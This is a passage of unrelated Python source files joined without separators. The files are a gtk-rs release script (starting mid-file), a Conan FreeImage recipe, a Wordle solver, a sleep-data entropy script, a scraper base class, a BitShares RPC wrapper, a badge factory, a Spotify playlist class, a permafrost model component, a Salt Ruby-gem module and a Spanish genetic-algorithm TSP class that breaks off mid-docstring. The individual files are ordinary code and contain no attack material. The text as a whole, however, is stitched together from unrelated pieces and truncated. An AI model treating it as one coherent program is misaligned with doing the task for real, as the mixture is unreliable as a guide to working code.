consts.MASTER_TMP_BRANCH) create_pull_request( consts.BLOG_REPO, consts.MASTER_TMP_BRANCH, "master", args.token) write_msg('Done!') def checkout_crate_branches(temp_dir, repositories): write_msg('=> Checking out "crate" branches') for repo in repositories: checkout_target_branch(repo, temp_dir, "crate") write_msg('Done!') def start(args, temp_dir): repositories = clone_repositories(args, temp_dir) if len(repositories) < 1: return if args.doc_only is False: if update_crates_versions(args, temp_dir, repositories) is False: return if args.badges_only is False and args.tags_only is False: build_blog_post(repositories, temp_dir, args.token) checkout_crate_branches(temp_dir, repositories) if args.doc_only is False and args.badges_only is False and args.tags_only is False: if update_crate_repositories_branches(args, temp_dir, repositories) is False: return if args.no_push is False: publish_crates(args, temp_dir) create_example_repository_pull_request(args) generate_tags_and_version_branches(args, temp_dir, repositories) regenerate_documentation(args, temp_dir, repositories) update_gtk_rs_blog(args, temp_dir) write_msg('Seems like most things are done! Now remains:') write_msg(" * Check generated docs for all crates (don't forget to enable features!).") input('Press ENTER to leave (once done, the temporary directory "{}" will be destroyed)' .format(temp_dir)) def main(argv): args = Arguments.parse_arguments(argv) if args is None: sys.exit(1) if check_rustdoc_is_nightly() is False: return if check_if_up_to_date() is False: return write_msg('=> Creating temporary directory...') with temporary_directory() as temp_dir: write_msg('Temporary directory created in "{}"'.format(temp_dir)) start(args, temp_dir) # Beginning of the script if __name__ == "__main__": main(sys.argv[1:]) conanfile.py0 import os import shutil from conans import ConanFile from conans import tools from conans import AutoToolsBuildEnvironment class FreeImageConan(ConanFile): name = "freeimage" version = "3.18.0" description = "FreeImage for Windows, pre-built binaries are supplied" license = "FIPL" settings = "os_build", "compiler", "build_type", "arch_build" url = "https://github.com/bldrvnlw/conan-freeimage" _source_subfolder = "FreeImage" _build_subfolder = "build_subfolder" _dist_subfolder = None def configure(self): pass def source(self): if self.settings.os_build != "Windows": tools.get("http://downloads.sourceforge.net/freeimage/FreeImage3180.zip") def build(self): if self.settings.os_build == "Windows": tools.get("http://downloads.sourceforge.net/freeimage/FreeImage3180Win32Win64.zip") else: autotools = AutoToolsBuildEnvironment(self) # In order to set environment vars - unused in this recipe env_build_vars = autotools.vars with tools.chdir(self._source_subfolder): # FIP : Makefile.fip is for FreeImagePlus, the C++ FreeImage wrapper # make if self.settings.os_build == "Macos": tools.replace_in_file('Makefile.osx', '-DNO_LCMS', '-DNO_LCMS -DDISABLE_PERF_MEASUREMENT') autotools.make(target="-f Makefile.osx", vars=env_build_vars) else: autotools.make(target="-f Makefile.gnu", vars=env_build_vars) print("Cur dir: ", os.getcwd(), " Dist subdir: ", os.listdir("./Dist")) self._dist_subfolder = os.path.join(os.getcwd(), "Dist"); # make install - not possible because chown fails #autotools.make(target="-f Makefile.gnu install", vars=env_build_vars) def package(self): if self.settings.os_build == "Windows": if self.settings.arch_build == "x86_64": src = os.path.join(self.build_folder, "FreeImage/Dist/x64") elif self.settings.arch_build == "x86": src = os.path.join(self.build_folder, "FreeImage/Dist/x32") self.copy("*.lib", dst="lib", src=src, keep_path=False) self.copy("*.dll", dst="bin", src=src, keep_path=False) self.copy("*.h", dst="include", src=src, keep_path=False) else: with tools.chdir(self._source_subfolder): self.copy("*.a", dst=os.path.join(self.package_folder, "lib"), src=self._dist_subfolder, keep_path=False) self.copy("*.so", dst=os.path.join(self.package_folder, "bin"), src=self._dist_subfolder, keep_path=False) self.copy("*.h", dst=os.path.join(self.package_folder, "include"), src=self._dist_subfolder, keep_path=False) if self.settings.os_build == "Macos": # dylib should be symlinked to the .a file (perhaps at conan install time) # Quick solution just copy & rename self.copy("*.a", dst=os.path.join(self.package_folder, "bin"), src=self._dist_subfolder, keep_path=False) os.rename(os.path.join(self.package_folder, "bin/libfreeimage.a"), os.path.join(self.package_folder, "bin/libfreeimage.dylib")) def package_info(self): self.cpp_info.libs = ["freeimage"]from game import Game import time from data import Data from simulation import buildPlots, letterDistributions from colorama import Fore if __name__ == '__main__': print("Welcome to my Wordle solver. You have a few options for what mode to run the program in. First, is the\n"+ "classic Wordle game in which you receive no help from the computer. The second is the info mode, which is\n"+ "like the classic game except you do receive help from the computer to reach the answer quicker. Next, their\n"+ "is the 'help' mode in which you play on your phone and enter your guess and the pattern you saw. This mode\n"+ "is included so that you can see it work on the daily Wordle which the program has no way of knowing. And if\n"+ "you want help of course. Finally, there is a 'plots' mode that will simulate 500 Wordle games for the top 100\n"+ "start words but I highly discourage this because you will be waiting a while. Enter 'classic', 'info', 'help',\n"+ "or 'plots' when you are ready.") mode = "" while mode != "classic" and mode != "info" and mode != "help" and mode != "plots": mode = input("Mode:").lower() if mode == "classic": game = Game() game.playClassic() elif mode == "info": game = Game() game.playWithInfo() elif mode == "help": print("In this mode the program will help you solve the daily Wordle online. To use it, will prompt you to\n"+ "enter your guess with the 'Guess:'. Make sure to enter the guess in all-caps. Once you enter your\n"+ "most recent guess, it will prompt you to enter the pattern you saw with that guess. This program \n"+ "encodes patters using 0's, 1's, and 2's for gray, yellow, and green respectively. So if the pattern\n"+ "you saw was gray, gray, yellow, gray, green, then you should enter 00102. Once you've entered a \n"+ "guess and the pattern you saw, you will be given a list of suggested guesses where for each guess\n"+ "you are given the amount of information you can expect to gain from that guess and the probability\n"+ "of that guess being the answer. Once the program narrows it down sufficiently, it will exit and tell\n"+ "you what the likely answer is.") data = Data() pattern = "00000" while len(data.possible) > 2: guess = input("Guess:") pattern = input("Pattern:") data.processInput(guess, pattern) print(Fore.BLACK + "WORD E[Info] Var[Info] p(WORD)") topTen = data.giveTop(10) for row in topTen: word, info, var, prob = row[0], row[1], row[2], row[3] print(f"{word} {round(info, 4)} {round(var,4)} {round(prob, 6)}") elif mode == "plots": letterDistributions() buildPlots() else: print("Please enter 'classic', 'info', 'help', or 'plots") time.sleep(2) print("\033[A \033[A") print("\033[A \033[A")############################################################# # # Real-world Data 1. Sleep Data # ############################################################# import sys, os sys.path.append("../..") sys.path.append("..") sys.path.append(os.getcwd()) import numpy as np import pandas as pd import copy import pickle from math import log, e from sklearn.linear_model import LinearRegression from numpy.linalg import eig from tslb.src.lzw import * from tslb.src.utils import * def import_data(): df = pd.read_csv("../data/sleep_data.csv", header=None) df = df[0].str.split(" ", expand = True) df.columns = ["heart_rate", "sleep", "temperature"] return df def plot_data(data): plt.title("Sleep Data") # plt.scatter(np.arange(len(data)),data, marker='.') plt.plot(data, marker='.') plt.xlabel("time") plt.ylabel("sleep status") plt.yticks([1,2,3,4]) plt.savefig("result/sleep_data.pdf", format='pdf') plt.show() def run_test(data, n): # input data = (pandas Series) # n = number of categories size = len(data) verbose = True ################ unique = np.unique(data) label = 0 for x in unique: data[data == x] = label label += 1 print(data) # observation analysis p_tilda=[] for i in range(1,n+1): p = np.mean(np.array(data.astype(int)) == i) p_tilda.append(p) print(p_tilda) # compression uncompressed = list_to_string(list(data)) compressed = compress(uncompressed) compression_ratio = len(compressed)/len(uncompressed) # entropy estimated_ent = get_entropy(n, size, compression_ratio, name = "sleep data", plot=True) # empirical_ent = entropy(p_tilda) # empirical_ent = 0 # lower bound lb = h_inverse(estimated_ent, n, a=0.0001) if verbose: print("p_tilda : ", np.round(p_tilda,3)) print("Compression ratio : ", compression_ratio) print("Estimated entropy : ", estimated_ent) # print("Empirical entropy : ", empirical_ent) print("P(e) lower bound : ", lb) # return compression_ratio, estimated_ent, empirical_ent def main(): print("*******************************************************") print("*******************************************************") print("********** Running the Testing Scripts. ***************") plt.rcParams.update({'font.size': 14}) plt.rcParams.update({'figure.autolayout': True}) df = import_data() data = df.sleep n = len(np.unique(data)) print("n=", n) data = data.astype(int) plot_data(data) # run_test(data, n) print("********** Testing Scripts Done. **********************") print("*******************************************************") print("*******************************************************") if __name__ == "__main__": main() # -*- coding: utf-8 -*- import logging from chibi.snippet import regex from chibi.snippet.func import retry_on_exception from chibi_requests import Chibi_url from .exceptions import Unexpected_response from .regex import main_url logger = logging.getLogger( 'kudasai.base' ) class Site: def __init__( self, url=None ): self.urls = [] if not url: raise NotImplementedError self.url = Chibi_url( url ) def append( self, url ): url = Chibi_url( url ) if not self.processing_order: raise NotImplementedError for proccesor in self.processing_order: result = proccesor.can_proccess( url ) if result: self.urls.append( proccesor( url ) ) return result @staticmethod def can_proccess( url ): raise NotImplementedError @retry_on_exception def get( self, *args, url=None, **kw ): if url is None: url = self.url response = url.get() if not response.ok: raise Unexpected_response return response @property def soup( self ): try: return self._soup except AttributeError: response = self.get() self._soup = response.native return self._soup import re from grapheneapi.api import Api as Original_Api from bitsharesbase.chains import known_chains from . import exceptions class Api(Original_Api): def post_process_exception(self, e): msg = exceptions.decodeRPCErrorMsg(e).strip() if msg == "missing required active authority": raise exceptions.MissingRequiredActiveAuthority elif re.match("current_account_itr == acnt_indx.indices().get().end()", msg): raise exceptions.AccountCouldntBeFoundException(msg) elif re.match("Assert Exception: is_valid_name( name )", msg): raise exceptions.InvalidAccountNameException(msg) elif re.match("^no method with name.*", msg): raise exceptions.NoMethodWithName(msg) elif msg: raise exceptions.UnhandledRPCError(msg) else: raise e class BitSharesNodeRPC(Api): def get_network(self): """ Identify the connected network. This call returns a dictionary with keys chain_id, core_symbol and prefix """ props = self.get_chain_properties() chain_id = props["chain_id"] for k, v in known_chains.items(): if v["chain_id"] == chain_id: return v raise Exception("Connecting to unknown network!") def get_account(self, name, **kwargs): """ Get full account details from account name or id :param str name: Account name or account id """ if len(name.split(".")) == 3: return self.get_objects([name])[0] else: return self.get_account_by_name(name, **kwargs) def get_asset(self, name, **kwargs): """ Get full asset from name of id :param str name: Symbol name or asset id (e.g. 1.3.0) """ if len(name.split(".")) == 3: return self.get_objects([name], **kwargs)[0] else: return self.lookup_asset_symbols([name], **kwargs)[0] def get_object(self, o, **kwargs): """ Get object with id ``o`` :param str o: Full object id """ return self.get_objects([o], **kwargs)[0] # encoding: utf-8 from labour.models import PersonnelClass def default_badge_factory(event, person): """ Specifies badge options, such as badge template and job title, given an event and a person. Returns a dictionary that can be fed into the constructor of badges.models:Badge. """ job_title = u'' if event.labour_event_meta is not None: from labour.models import Signup try: signup = Signup.objects.get(event=event, person=person) except Signup.DoesNotExist: # XXX blatantly assuming it's a programme person job_title = u'Ohjelmanjärjestäjä' personnel_class = PersonnelClass.objects.get(event=event, slug='ohjelma') else: if signup.job_title: job_title = signup.job_title elif signup.job_categories_accepted.exists(): job_title = signup.job_categories_accepted.first().name personnel_class = signup.personnel_classes.order_by('priority').first() return dict( personnel_class=personnel_class, job_title=job_title, ) spotify/playlist_unseen_tracks.py from __future__ import unicode_literals import logging import pprint import spotify from spotify import compat, ffi, lib, serialized __all__ = ["PlaylistUnseenTracks"] logger = logging.getLogger(__name__) class PlaylistUnseenTracks(compat.Sequence): """A list of unseen tracks in a playlist. The list may contain items that are :class:`None`. Returned by :meth:`PlaylistContainer.get_unseen_tracks`. """ _BATCH_SIZE = 100 @serialized def __init__(self, session, sp_playlistcontainer, sp_playlist): self._session = session lib.sp_playlistcontainer_add_ref(sp_playlistcontainer) self._sp_playlistcontainer = ffi.gc( sp_playlistcontainer, lib.sp_playlistcontainer_release ) lib.sp_playlist_add_ref(sp_playlist) self._sp_playlist = ffi.gc(sp_playlist, lib.sp_playlist_release) self._num_tracks = 0 self._sp_tracks_len = 0 self._get_more_tracks() @serialized def _get_more_tracks(self): self._sp_tracks_len = min( self._num_tracks, self._sp_tracks_len + self._BATCH_SIZE ) self._sp_tracks = ffi.new("sp_track *[]", self._sp_tracks_len) self._num_tracks = lib.sp_playlistcontainer_get_unseen_tracks( self._sp_playlistcontainer, self._sp_playlist, self._sp_tracks, self._sp_tracks_len, ) if self._num_tracks < 0: raise spotify.Error("Failed to get unseen tracks for playlist") def __len__(self): return self._num_tracks def __getitem__(self, key): if isinstance(key, slice): return list(self).__getitem__(key) if not isinstance(key, int): raise TypeError( "list indices must be int or slice, not %s" % key.__class__.__name__ ) if key < 0: key += self.__len__() if not 0 <= key < self.__len__(): raise IndexError("list index out of range") while key >= self._sp_tracks_len: self._get_more_tracks() sp_track = self._sp_tracks[key] if sp_track == ffi.NULL: return None return spotify.Track(self._session, sp_track=sp_track, add_ref=True) def __repr__(self): return "PlaylistUnseenTracks(%s)" % pprint.pformat(list(self)) mcflugen/permamodel # -*- coding: utf-8 -*- """ Kudryavtsev model by Anisimov et al. (1997). ., ., & . (1997). Global warming and active-layer thickness: results from transient general circulation models. Global and Planetary Change, 15(3-4), 61-77. DOI:10.1016/S0921-8181(97)00009-X *The MIT License (MIT)* Copyright (c) 2016 permamodel Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. * """ from __future__ import print_function import warnings warnings.filterwarnings("ignore",category =RuntimeWarning) import numpy as np from permamodel.utils import model_input from permamodel.components import perma_base from permamodel.components import Ku_method #from permamodel.components.perma_base import * #from permamodel.tests import examples_directory import os """ class BmiKuMethod( perma_base.PermafrostComponent ): _thisname = 'this name' """ class BmiKuMethod( perma_base.PermafrostComponent ): """ Implement the Ku model """ # Set up the name of this permafrost module _name = 'Ku module' """ Note: all of these are defined below instead! # Indicate the CSDMS standard names of input and output variables _input_var_names = ('land_surface_air__temperature', 'land_surface__latitude', 'land_surface__longitude', ) # other standard names that might apply? # land_surface__temperature # model__initial_time_step # model__max_allowed_time_step # model__min_allowed_time_step # model__run_time # model__spinup_time # model__start_time # model__stop_time # model__time # model__time_step # model__time_step_count _output_var_names = ('frost_number_air', 'frost_number_surface', 'frost_number_stefan', ) # other standard names that might apply? # soil_permafrost__thickness # soil_permafrost_top__depth # soil_permafrost_bottom__depth """ #------------------------------------------------------------------- _att_map = { # NOTE: this will change in the future 'model_name': 'PermaModel_Kudryavtsev_method', 'version': '0.1', 'author_name': ' and ', 'grid_type': 'none', 'time_step_type': 'fixed', 'step_method': 'explicit', #------------------------------------------------------------- 'comp_name': 'Ku_model', 'model_family': 'PermaModel', 'cfg_extension': '_ku_model.cfg', 'cmt_var_prefix': '/input/', 'gui_yaml_file': '/input/ku_model.yaml', 'time_units': 'years' } # This used to be [...] instead of (...) _input_var_names = ( 'latitude', 'longitude', 'datetime__start', 'datetime__end', 'atmosphere_bottom_air__temperature', 'atmosphere_bottom_air__temperature_amplitude', 'snowpack__depth', 'snowpack__density', 'water-liquid__volumetric-water-content-soil', 'vegetation__Hvgf', 'vegetation__Hvgt', 'vegetation__Dvf', 'vegetation__Dvt' ) _output_var_names = ( 'soil__temperature', # Tps 'soil__active_layer_thickness' ) # Zal _var_name_map = { 'latitude': 'lat', 'longitude': 'lon', 'datetime__start': 'start_year', 'datetime__end': 'end_year', 'atmosphere_bottom_air__temperature': 'T_air', 'atmosphere_bottom_air__temperature_amplitude': 'A_air', 'snowpack__depth': 'h_snow', 'snowpack__density': 'rho_snow', 'water-liquid__volumetric-water-content-soil': 'vwc_H2O', 'vegetation__Hvgf': 'Hvgf', 'vegetation__Hvgt': 'Hvgt', 'vegetation__Dvf': 'Dvf', 'vegetation__Dvt': 'Dvt' , 'soil__temperature': 'Tps', 'soil__active_layer_thickness': 'Zal'} _var_units_map = { # These are the links to the model's variables' units 'latitude': 'degree_north', 'longitude': 'degree_east', 'datetime__start': 'year', 'datetime__end': 'year', 'atmosphere_bottom_air__temperature': 'deg_C', 'atmosphere_bottom_air__temperature_amplitude': 'deg_C', 'snowpack__depth': 'm', 'snowpack__density': 'kg m-3', 'water-liquid__volumetric-water-content-soil': 'm3 m-3', 'vegetation__Hvgf': 'm', 'vegetation__Hvgt': 'm', 'vegetation__Dvf': 'm2 s-1', 'vegetation__Dvt': 'm2 s-1' , 'soil__temperature': 'deg_C', 'soil__active_layer_thickness': 'm'} #------------------------------------------------------------------- def __init__(self): self._model = None self._values = {} self._var_units = {} self._grids = {} self._grid_type = {} def initialize(self, cfg_file=None): self._model = Ku_method.Ku_method() self._name = "Permamodel Ku Component" self._model.initialize(cfg_file=cfg_file) # make 2 vars to store each results and used for write out. n_lat = np.size(self._model.lat) n_lon = np.size(self._model.lon) n_time = self._model.end_year-self._model.start_year+1 self.output_alt = np.zeros((n_time,n_lat,n_lon))*np.nan; self.output_tps = np.zeros((n_time,n_lat,n_lon))*np.nan; # Verify that all input and output variable names are in the # variable name and the units map for varname in self._input_var_names: assert(varname in self._var_name_map) assert(varname in self._var_units_map) #print("Input var %s is in the name map and the units map"\ # % varname) for varname in self._output_var_names: assert(varname in self._var_name_map) assert(varname in self._var_units_map) self._model.cont = -1 gridnumber = 0 for varname in self._input_var_names: self._grids[gridnumber] = varname #self._grid_type[gridnumber] = 'uniform_rectilinear' self._grid_type[gridnumber] = 'scalar' gridnumber += 1 for varname in self._output_var_names: self._grids[gridnumber] = varname #self._grid_type[gridnumber] = 'uniform_rectilinear' self._grid_type[gridnumber] = 'scalar' gridnumber += 1 self._values = { # These are the links to the model's variables and # should be consistent with _var_name_map 'latitude': self._model.lat, 'longitude': self._model.lon, 'datetime__start': self._model.start_year, 'datetime__end': self._model.end_year, # 'atmosphere_bottom_air__temperature': "T_air", 'atmosphere_bottom_air__temperature': self._model.T_air, 'atmosphere_bottom_air__temperature_amplitude': self._model.A_air, 'snowpack__depth': self._model.h_snow, 'snowpack__density': self._model.rho_snow, 'water-liquid__volumetric-water-content-soil': self._model.vwc_H2O, 'vegetation__Hvgf': self._model.Hvgf, 'vegetation__Hvgt': self._model.Hvgt, 'vegetation__Dvf': self._model.Dvf, 'vegetation__Dvt': self._model.Dvt, 'soil__temperature': self._model.Tps, 'soil__active_layer_thickness': self._model.Zal} # Set the cfg file if it exists, otherwise, a default # if cfg_file==None: # # print self.cfg_file def get_attribute(self, att_name): try: return self._att_map[ att_name.lower() ] except: print('###################################################') print(' ERROR: Could not find attribute: ' + att_name) print('###################################################') print(' ') # get_attribute() #------------------------------------------------------------------- def get_input_var_names(self): #-------------------------------------------------------- # Note: These are currently variables needed from other # components vs. those read from files or GUI. #-------------------------------------------------------- return self._input_var_names # get_input_var_names() #------------------------------------------------------------------- def get_output_var_names(self): return self._output_var_names # get_output_var_names() #------------------------------------------------------------------- def get_var_name(self, long_var_name): return self._var_name_map[ long_var_name ] # get_var_name() #------------------------------------------------------------------- def get_var_units(self, long_var_name): return self._var_units_map[ long_var_name ] def get_var_location(self, long_var_name): return "node" def update(self): # self._model.update(self._model.dt) # Ensure that we've already initialized the run assert(self._model.status == 'initialized') # Calculate the new frost number values self._model.update_ground_temperatures() self._model.update_ALT() self._values['soil__active_layer_thickness'] = self._model.Zal self._values['soil__temperature'] = self._model.Tps # Update the time self._model.year += self._model.dt self._model.cont = self._model.cont + 1 # self.output_alt = np.append(self.output_alt, self._model.Zal) # self.output_tps = np.append(self.output_tps, self._model.Tps) self.output_alt[self._model.cont,:,:] = self._model.Zal self.output_tps[self._model.cont,:,:] = self._model.Tps # Get new input values self._model.read_input_files() def update_frac(self, time_fraction): time_step = self.get_time_step() self._model.dt = time_fraction * time_step self.update() self._model.dt = time_step def update_until(self, then): n_steps = (then - self.get_current_time()) / self.get_time_step() for _ in range(int(n_steps)): self.update() self.update_frac(n_steps - int(n_steps)) def finalize(self): SILENT = True # Finish with the run self._model.status = 'finalizing' # (OpenMI) # Close the input files self._model.close_input_files() # Close any input files # Write output last output self.save_grids() # Done finalizing self._model.status = 'finalized' # (OpenMI) def get_start_time(self): return 0.0 def get_current_time(self): return float(self._model.year - self._model.start_year) def get_end_time(self): return self._model.end_year - self._model.start_year + 1.0 # ---------------------------------- # Functions added to pass bmi-tester # ---------------------------------- def get_grid_type(self, grid_number): return self._grid_type[grid_number] def get_time_step(self): return self._model.dt # Note: get_value_ref() copied from bmi_heat.py def get_value_ref(self, var_name): """Reference to values. Parameters ---------- var_name : str Name of variable as CSDMS Standard Name. Returns ------- array_like Value array. """ return self._values[var_name] def set_value(self, var_name, new_var_values): setattr(self._model, self._var_name_map[var_name], new_var_values) # self._values[var_name] = new_var_values def set_value_at_indices(self, var_name, new_var_values, indices): self.get_value_ref(var_name).flat[indices] = new_var_values def get_var_itemsize(self, var_name): return np.asarray(self.get_value_ref(var_name)).flatten()[0].nbytes def get_value_at_indices(self, var_name, indices): return self.get_value_ref(var_name).take(indices) def get_var_nbytes(self, var_name): return np.asarray(self.get_value_ref(var_name)).nbytes def get_value(self, var_name, out=None): """Copy of values. Parameters ---------- var_name : str Name of variable as CSDMS Standard Name. Returns ------- array_like Copy of values. """ # Original version: from bmi_heat.py #return self.get_value_ref(var_name).copy() # Version to convert to numpy array for bmi-tester compliance # Note: converting to np arrays on the fly here # Note: float values don't have a copy() function #try: # return np.array(self.get_value_ref(var_name).copy()) #except AttributeError: # return np.array(self.get_value_ref(var_name)) if out is None: out = self.get_value_ref(var_name).copy() else: out[...] = self.get_value_ref(var_name) return out def get_var_type(self, var_name): """Data type of variable. Parameters ---------- var_name : str Name of variable as CSDMS Standard Name. Returns ------- str Data type. """ return str(self.get_value_ref(var_name).dtype) def get_component_name(self): return self._name # Copied from bmi_heat.py def get_var_grid(self, var_name): """Grid id for a variable. Parameters ---------- var_name : str Name of variable as CSDMS Standard Name. Returns ------- int Grid id. """ for grid_id, var_name_list in self._grids.items(): if var_name in var_name_list: return grid_id def get_grid_size(self, grid_id): """Size of grid. Parameters ---------- grid_id : int Identifier of a grid. Returns ------- int Size of grid. """ return 1 def get_grid_rank(self, var_id): """Rank of grid. Parameters ---------- grid_id : int Identifier of a grid. Returns ------- int Rank of grid. """ return 0 def save_grids(self): # Saves the grid values based on the prescribed ones in cfg file #if (self.SAVE_MR_GRIDS): # model_output.add_grid( self, self.T_air, 'T_air', self.time_min ) # self.ALT_file = self.out_directory + self.ALT_file try: assert self._model.SAVE_ALT_GRIDS except: print('NO OUTPUT of ALT') try: assert self._model.SAVE_TPS_GRIDS except: print('NO OUTPUT of TPS') if (self._model.SAVE_ALT_GRIDS): self._model.write_out_ncfile(self._model.ALT_file, self.output_alt) # self.TPS_file = self.out_directory + self.TPS_file if (self._model.SAVE_TPS_GRIDS): self._model.write_out_ncfile(self._model.TPS_file,self.output_tps) print("***") print("Writing output finished!") print("Please look at"+self._model.ALT_file+'.nc and '+self._model.TPS_file+'.nc') # -*- coding: utf-8 -*- ''' Manage ruby gems. ''' # Import python libs import re __func_alias__ = { 'list_': 'list' } def _gem(command, ruby=None, runas=None): cmdline = 'gem {command}'.format(command=command) if __salt__['rvm.is_installed'](runas=runas): return __salt__['rvm.do'](ruby, cmdline, runas=runas) if __salt__['rbenv.is_installed'](runas=runas): return __salt__['rbenv.do'](cmdline, runas=runas) ret = __salt__['cmd.run_all']( cmdline, runas=runas ) if ret['retcode'] == 0: return ret['stdout'] else: return False def install(gems, # pylint: disable=C0103 ruby=None, runas=None, version=None, rdoc=False, ri=False, pre_releases=False, proxy=None): # pylint: disable=C0103 ''' Installs one or several gems. gems The gems to install ruby : None If RVM or rbenv are installed, the ruby version and gemset to use. runas : None The user to run gem as. version : None Specify the version to install for the gem. Doesn't play nice with multiple gems at once rdoc : False Generate RDoc documentation for the gem(s). ri : False Generate RI documentation for the gem(s). pre_releases Include pre-releases in the available versions proxy : None Use the specified HTTP proxy server for all outgoing traffic. Format: http://hostname[:port] CLI Example: .. code-block:: bash salt '*' gem.install vagrant ''' options = [] if version: options.append('--version {0}'.format(version)) if not rdoc: options.append('--no-rdoc') if not ri: options.append('--no-ri') if pre_releases: options.append('--pre') if proxy: options.append('-p {0}'.format(proxy)) cmdline_args = ' '.join(options) return _gem('install {gems} {options}'.format(gems=gems, options=cmdline_args), ruby, runas=runas) def uninstall(gems, ruby=None, runas=None): ''' Uninstall one or several gems. gems The gems to uninstall. ruby : None If RVM or rbenv are installed, the ruby version and gemset to use. runas : None The user to run gem as. CLI Example: .. code-block:: bash salt '*' gem.uninstall vagrant ''' return _gem('uninstall {gems}'.format(gems=gems), ruby, runas=runas) def update(gems, ruby=None, runas=None): ''' Update one or several gems. gems The gems to update. ruby : None If RVM or rbenv are installed, the ruby version and gemset to use. runas : None The user to run gem as. CLI Example: .. code-block:: bash salt '*' gem.update vagrant ''' return _gem('update {gems}'.format(gems=gems), ruby, runas=runas) def update_system(version='', ruby=None, runas=None): ''' Update rubygems. version : (newest) The version of rubygems to install. ruby : None If RVM or rbenv are installed, the ruby version and gemset to use. runas : None The user to run gem as. CLI Example: .. code-block:: bash salt '*' gem.update_system ''' return _gem('update --system {version}'. format(version=version), ruby, runas=runas) def list_(prefix='', ruby=None, runas=None): ''' List locally installed gems. prefix : Only list gems when the name matches this prefix. ruby : None If RVM or rbenv are installed, the ruby version and gemset to use. runas : None The user to run gem as. CLI Example: .. code-block:: bash salt '*' gem.list ''' gems = {} stdout = _gem('list {prefix}'.format(prefix=prefix), ruby, runas=runas) lines = [] if isinstance(stdout, str): lines = stdout.splitlines() for line in lines: match = re.match(r'^([^ ]+) \((.+)\)', line) if match: gem = match.group(1) versions = match.group(2).split(', ') gems[gem] = versions return gems def sources_add(source_uri, ruby=None, runas=None): ''' Add a gem source. source_uri The source URI to add. ruby : None If RVM or rbenv are installed, the ruby version and gemset to use. runas : None The user to run gem as. CLI Example: .. code-block:: bash salt '*' gem.sources_add http://rubygems.org/ ''' return _gem('sources --add {source_uri}'. format(source_uri=source_uri), ruby, runas=runas) def sources_remove(source_uri, ruby=None, runas=None): ''' Remove a gem source. source_uri The source URI to remove. ruby : None If RVM or rbenv are installed, the ruby version and gemset to use. runas : None The user to run gem as. CLI Example: .. code-block:: bash salt '*' gem.sources_remove http://rubygems.org/ ''' return _gem('sources --remove {source_uri}'. format(source_uri=source_uri), ruby, runas=runas) def sources_list(ruby=None, runas=None): ''' List the configured gem sources. ruby : None If RVM or rbenv are installed, the ruby version and gemset to use. runas : None The user to run gem as. CLI Example: .. code-block:: bash salt '*' gem.sources_list ''' ret = _gem('sources', ruby, runas=runas) return [] if ret is False else ret.splitlines()[2:] from dominio_ag import DominioAG from dominio_tsp import DominioTSP from datos import crear_datos import random import csv class DominioAGTSP(DominioAG, DominioTSP): """ Representa el objeto de dominio que conoce los detalles de implementación y modelamiento del problema del vendedor viajero para ser resuelto con algoritmos genéticos. Las soluciones se modelan como listas de enteros, donde cada número representa una ciudad específica. Si el grafo contiene n ciudades, la lista siempre contiene (n-1) elementos. La lista nunca contiene elementos repetidos y nunca contiene la ciudad de inicio y fin del circuito. Métodos: generar(n) Construye aleatoriamente una lista de listas que representa n posibles soluciones al problema. cruzar(sol_a, sol_b) Produce una nueva posible solución cruzando las dos soluciones dadas por parámetro. mutar(sol) Produce una nueva solución aplicando un ligero cambio a la solución dada por parámetro. """ def __init__(self, ciudades_rutacsv, ciudad_inicio): """Construye un objeto de modelo de dominio para una instancia específica del problema del vendedor viajero para ser resuelto con algoritmos genéticos. Entradas: ciudades_rutacsv (str) Ruta al archivo csv que contiene la matriz de pesos entre las ciudades para las que se quiere resolver el problema del vendedor viajero. ciudad_inicio (str) Nombre de la ciudad que será el inicio y fin del circuito a calcular. Salidas: Una instancia de DominioAGTSP correctamente inicializada. """ """self.matriz_ciudades, self.indice_ciudades_dicc = crear_datos(ciudades_rutacsv) self.n_ciudades = len(self.indice_ciudades_dicc) self.indice_ciudad_inicio = self.indice_ciudades_dicc[ciudad_inicio] self.ciudad_inicio = ciudad_inicio""" # self.ciudades, self.i_ciudades = crear_datos(ciudades_rutacsv) # self.n_ciudades = len(self.ciudades) # self.nombre_ciudad_inicio = ciudad_inicio # self.i_ciudad_inicio = self.i_ciudades[ciudad_inicio] mat=[] with open(ciudades_rutacsv, 'r') as file: reader = csv.reader(file) for row in reader: mat.append(row) self.matriz=mat self.ciudades_rutacsv=ciudades_rutacsv self.ciudad_inicio=ciudad_inicio def generar_n(self, n): """Construye aleatoriamente una lista de listas que representa n posibles soluciones al problema. Entradas: n (int) Número de soluciones aleatorias a generar. Salidas: (list) Lista que contiene n listas, cada una representando una posible solución al problema modelado por el objeto de dominio. """ sols = [] for x in range(n): nuevo = self.generar() valido = self.validar(nuevo) while(not valido): nuevo = self.generar() valido = self.validar(nuevo) sols.append(nuevo) return sols def cruzar(self, sol_a, sol_b): """Produce una nueva posible solución cruzando las dos soluciones dadas por parámetro. Entradas: sol_a (estructura de datos) Estructura de datos que modela la solución antecesora A que será cruzada con la B sol_b (estructura de datos) Estructura de datos que modela la solución antecesora B que será cruzada con la A Salidas: (estructura de datos) Una nueva solución producto del cruzamiento entre las soluciones A y B """ P1 = sol_a P2 = sol_b lenOri = len(sol_a) H1 = [-1] * lenOri geneA = 0 geneB = 0 while (geneA == geneB):#para que lo rango no sea igual a vacio geneA = int(random.random() * lenOri) geneB = int(random.random() * lenOri) startGene = min(geneA, geneB) endGene = max(geneA, geneB) for i in range(startGene, endGene): H1[i] = P1[i] rec = 0#recorrido del padre recorrido = 0#pos en la que va el nuevo elemento while (rec < lenOri): while (H1[recorrido] != -1 and recorrido + 1 < lenOri): recorrido += 1 if (P2[rec] not in H1): H1[recorrido] = P2[rec] rec += 1 return H1 def mutar(self, sol): """Produce una nueva 